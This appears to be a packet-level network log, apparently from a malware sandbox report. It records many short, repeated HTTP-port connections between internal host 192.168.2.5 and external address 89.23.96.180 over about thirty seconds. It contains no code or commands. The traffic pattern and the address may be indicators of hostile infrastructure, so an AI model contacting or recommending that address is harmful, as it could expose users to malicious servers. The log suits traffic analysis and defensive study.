                                                              Dec 21, 2024 10:48:33.403053999 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.403202057 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.403215885 CET804991789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.403285027 CET4991780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.403426886 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.523231030 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.752819061 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:33.872643948 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.872679949 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:33.872709036 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.581732035 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.581772089 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701491117 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.701574087 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701699972 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.701819897 CET804992389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.701894999 CET4992380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.703136921 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.821202993 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.822752953 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:34.822818995 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.822994947 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:34.942397118 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.049635887 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:35.169584990 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.169651031 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.174597025 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:35.294426918 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.294466019 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:35.294495106 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.078263998 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.127571106 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.199074984 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.252646923 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.314208984 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.361949921 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.438060045 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.486942053 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560292006 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560307980 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.560590029 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680613995 CET804992689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680646896 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680742025 CET4992680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680792093 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.680911064 CET804992789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:36.680968046 CET4992780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.681042910 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:36.800615072 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:37.033935070 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:37.153847933 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:37.153897047 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:37.153909922 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:38.063987017 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:38.111998081 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:38.298237085 CET804993289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:38.346358061 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:38.420653105 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:38.540435076 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:38.540592909 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:38.540770054 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:38.660326958 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:38.893332005 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:39.013062954 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:39.013079882 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:39.013092995 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:39.926347017 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:39.971524954 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.158488989 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.159121037 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.280647039 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.282918930 CET804993789.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.283015013 CET4993780192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.400638103 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.402924061 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.402971029 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.522454023 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.752748013 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:40.872550964 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.872607946 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:40.872639894 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:41.315958023 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:41.439843893 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:41.439922094 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:41.440223932 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:41.559770107 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:41.782668114 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:41.799827099 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:41.830739975 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:41.919673920 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:41.919810057 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.013999939 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.065099955 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.147860050 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.148348093 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.267899990 CET804994389.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.267962933 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.268038034 CET4994380192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.268089056 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.268290043 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.388343096 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.627696991 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:42.747478008 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.747514009 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.747541904 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.818876982 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:42.862250090 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.054467916 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:43.096328020 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.647444963 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:43.690169096 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.882312059 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:43.924520016 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.998133898 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.998174906 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:43.998478889 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.118065119 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.118164062 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.118333101 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.118349075 CET804994989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.118402958 CET4994980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.118428946 CET804995089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.118489027 CET4995080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.238398075 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.471466064 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:44.591474056 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.591519117 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:44.591569901 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:45.493215084 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:45.533863068 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:45.726149082 CET804995689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:45.768239975 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:45.841690063 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:45.961437941 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:45.961529970 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:45.961669922 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:46.081202030 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:46.315282106 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:46.435206890 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:46.435295105 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:46.435347080 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:47.357382059 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:47.408915997 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.591365099 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:47.643311024 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.721820116 CET4995680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.721929073 CET4993280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.722848892 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.723181009 CET4996580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.842942953 CET804996589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:47.843010902 CET4996580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.843193054 CET4996580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.843774080 CET804996289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:47.843857050 CET4996280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:47.962718964 CET804996589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.074131012 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.074429989 CET4996580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.193837881 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.193959951 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.194130898 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.203130960 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.234118938 CET804996589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.313673973 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.322835922 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.322961092 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.323137045 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.443978071 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.549829960 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.669446945 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.669533968 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.674658060 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:48.794507027 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.794544935 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.794591904 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.880645037 CET804996589.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:48.880892992 CET4996580192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:49.586607933 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:49.627619028 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:49.700807095 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:49.752608061 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:49.822242022 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:49.877722025 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:49.934279919 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:49.986984968 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.061541080 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.061618090 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.061772108 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.181425095 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.181494951 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.181499958 CET804996989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.181554079 CET4996980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.181874037 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.182167053 CET804997089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.182220936 CET4997080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.301496983 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.534004927 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:50.654225111 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.654272079 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:50.654308081 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:51.559262991 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:51.612020016 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:51.794218063 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:51.798410892 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:51.918454885 CET804997689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:51.918550014 CET4997680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:52.015333891 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:52.134932995 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:52.135010958 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:52.139067888 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:52.258651972 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:52.491070986 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:52.610893965 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:52.610934019 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:52.610970974 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:53.516086102 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:53.565102100 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.750524044 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:53.799516916 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.874557972 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.874753952 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.994435072 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:53.994551897 CET804997889.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:53.994684935 CET4997880192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.994893074 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:53.994893074 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:54.114603996 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:54.346478939 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:54.466499090 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:54.466533899 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:54.466547966 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:54.851613045 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:54.851809978 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:54.971963882 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:54.972836971 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:54.975490093 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.014316082 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.032335997 CET804998489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.033035040 CET4998480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.095267057 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.096771002 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.216828108 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.216999054 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.227880001 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.331592083 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.347415924 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.451390982 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.452086926 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.580857992 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:55.700783014 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.700794935 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:55.700803041 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:56.349797964 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:56.393258095 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.582842112 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:56.594433069 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:56.627641916 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.643261909 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.834234953 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:56.877635956 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.964766026 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.965010881 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:56.965311050 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.085165977 CET804998989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.085237980 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.085347891 CET4998980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.085403919 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.085597992 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.086399078 CET804999089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.086482048 CET4999080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.205291033 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.440265894 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:57.559868097 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.559997082 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:57.560029984 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:58.462394953 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:58.502655029 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:58.694391966 CET804999689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:58.737049103 CET4999680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:58.819907904 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:58.939611912 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:58.939714909 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:58.939971924 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:59.059530020 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:59.283992052 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:48:59.403970957 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:59.403989077 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:48:59.404001951 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:00.365125895 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:00.408987045 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.554080963 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:00.596400023 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.685340881 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.685481071 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.804982901 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:00.805166960 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.805185080 CET805000289.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:00.805243015 CET5000280192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.805372000 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:00.924909115 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.159497976 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:01.279572010 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.279664993 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.279695988 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.548410892 CET804979189.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.548500061 CET4979180192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:01.681910038 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:01.802800894 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.805491924 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:01.815587044 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:01.935440063 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:01.949177980 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.069329023 CET805000489.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.069634914 CET5000480192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.094324112 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.174602985 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.213980913 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.214081049 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.214210987 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.294554949 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.294593096 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.333940983 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.565342903 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:02.685162067 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.685199976 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:02.685216904 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.186129093 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.408915997 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.422312021 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.595254898 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.596419096 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.752649069 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.826407909 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:03.954241991 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.954474926 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:03.954653025 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074513912 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074559927 CET805000989.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074623108 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074676037 CET5000980192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.074774027 CET805001089.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.074954987 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.075010061 CET5001080192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.194463968 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.424951077 CET5001680192.168.2.589.23.96.180
                                                              Dec 21, 2024 10:49:04.544702053 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.544755936 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:04.544787884 CET805001689.23.96.180192.168.2.5
                                                              Dec 21, 2024 10:49:05.452729940 CET805001689.23.96.180192.168.2.5
